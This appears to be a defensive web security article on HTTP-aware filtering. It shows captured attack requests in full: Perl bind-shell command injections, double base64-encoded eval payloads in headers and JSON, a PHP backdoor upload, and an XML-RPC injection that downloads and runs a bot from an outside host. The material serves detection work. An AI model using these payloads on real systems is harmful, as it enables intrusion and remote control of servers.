Securing your web application – a deep understanding of HTTP protocol

One of the requirements of web application security filters is to have a deep understanding of the HTTP protocol; this requirement’s objectives are to:

1. Enable the security filter to detect attack payloads in variety of HTTP locations (mainly in the request) such as:
• The URL
• The query string
• Headers
• The request content
• XML
• Multipart/form-data
• POST parameters (application/x-www-form-urlencoded)
• JSON
2. Provide the ability to search for specific patterns in specific locations, raising the level of pattern detection accuracy and, as a result, reduce false positives.

Taking this requirement to real life examples, I will show how hackers send attack payloads in different HTTP locations, trying to find application vulnerabilities in as many ways as possible.

POST parameter in content - system command injection

POST /parse_xml.cgi HTTP/1.1
Host: www.application.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 261

filename=;perl -mio -e '$p=fork();exit,if$p;$c=new io::socket::inet(localport,28605,reuse,1,listen)
->accept;$~->fdopen($c,w);stdin->fdopen($c,r);system$_ while<>'

Request header – system command injection
The attack in the example below sends a base64 decoded payload.

GET /test.php?evalme=eval($_server[http_x_ranxokdzbdyodszaj]); HTTP/1.1
Host: www.application.com
X-RANXOKDZBDYODSZAJ: eval(base64_decode(c3lzdGVtKGJhc2U2NF9kZWNvZGUoJ2NHVnliQ0F0
VFVsUElDM
WxJQ2NrY0QxbWIzSnJLQ2s3WlhocGRDeHBaaVJ3T3lSalBXNWxk
eUJKVHpvNlUyOWphMlYwT2pwSlRrVlVLRXh2WTJGc1VHOXlkQ3
d5TXpjeE1DeFNaWFZ6WlN3eExFeHBjM1JsYmlrdFBtRmpZMlZ3ZERz
a2ZpMCtabVJ2Y0dWdUtDUmpMSGNwTzFOVVJFbE9MVDVtWkc5d1
pXNG9KR01zY2lrN2MzbHpkR1Z0SkY4Z2QyaHBiR1U4UGljPScpKTs));
Connection:close

The first decoding will result in:

system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5l
dyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyMzcxMCxSZXVzZSwxLExpc3RlbiktP
mFjY2VwdDskfi0+ZmRvcGVuKCRjLHcpO1NURElOLT5mZG9wZW4oJGMscik7c3lzdGVt
JF8gd2hpbGU8Pic=')KTs

The second decoding:

perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,23710,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdope
n($c,r);system$_ while

The hacker uses double encoding to evade security filter encoding.

Parameter JSON – system command injection

POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1
Host: www.application.com
Content-Type: text/x-json
Content-Length: 357

{ "id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "Calculator", "method":
"add(1,1);syste(base64_decode'cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiR
wOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwxNDA3NCxSZXVzZS
wxLExpc3RlbiktPmFjY2VwdDskfi0+ZmRvcGVuKCRjLHcpO1NURElOLT5mZG9wZ
W4oJGMscik7c3lzdGVtJF8gd2hpbGU8Pic='));;$obj->add", "params": ["1", "5"] }

Parameter multipart form data – malicious file upload

POST /tikiwiki/jhot.php HTTP/1.1
Host: www.application.com
Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 830

-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="filepath"; filename="tiki-config.php";


<?php // $header: /cvsroot/tikiwiki/tiki/tiki-config.php,v 1.8.2.5 2005/08/22 08:00:53
 telenieko exp $ // copyright (c) 2002-2005, luis argerich, garland foster, eduardo polid
or, et. al. // all rights reserved. see copyright.txt for details and a complete list of authors.
 // licensed under the gnu lesser general public license. see license.txt for details.
 # $header: /cvsroot/tikiwiki/tiki/banner_image.php,v 1.8.2.5 2005/08/22 08:00:53 telenieko
 exp $ // tikiwiki configuration script eval(base64_decode"zxjyb3jfcmvwb3
j0aw5nkdapo3nldf90aw1lx2xpbwl0kdapo2vjag8gim15x2rlbgltijtwyxnzdghydsgkx1nfulzful
sisfruuf9dtelftlrfsvaixsk7")); ?>

-----------------------------7d529a1d23092a--

Parameter XML – command injection

POST /htph/faq/xmlrpc.php HTTP/1.1
Host: www.application.com
Content-Type: text/xml
Content-Length: 503

test.method
',''));echo 'startcode
';echo passthru('cd /tmp;wget http://efnetbs.webs.com/bot.txt;fetch http://efnetbs.webs.com/bot.txt;curl -o bot.txt http://efnetbs.webs.com/bot.txt;lynx
 http://efnetbs.webs.com/bot.txt > bot.txt;GET http://efnetbs.webs.com/bot.txt
> bot.txt;lwp-download http://efnetbs.webs.com/bot.txt;perl bot.txt;rm -rf *txt*');
echo 'endcode';exit;/*

Note – searching for patterns on all the request content can result in numerous false positives.